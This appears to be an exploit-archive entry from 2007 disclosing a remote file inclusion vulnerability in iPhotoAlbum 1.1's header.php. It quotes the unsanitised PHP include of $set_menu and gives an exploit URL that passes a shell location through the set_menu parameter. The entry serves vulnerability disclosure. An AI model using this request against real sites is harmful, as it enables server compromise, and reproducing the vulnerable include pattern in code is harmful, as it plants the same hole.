id: 1662
date: 03/27/2007
title: iPhotoAlbum 1.1 (header.php) Remote File Include Vulnerability
author: GoLd_M
cves: 

==============================================================
iPhotoAlbum 1.1 (header.php) Remote File Include Vulnerability
==============================================================




# iPhotoAlbum v1.1(header.php)Remote File Include Vulnerability
# D.Script: http://sourceforge.net/projects/iphotoalbum/
# Discovered by: GloD_M = [Mahmood_ali]
# V.Code 
# <?php if(isset($set_menu)) { include("$set_menu"); } ?>
# Exploit:[Path]/lib/static/header.php?set_menu=SheLL
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group



#  0day.today [2023-03-23]  #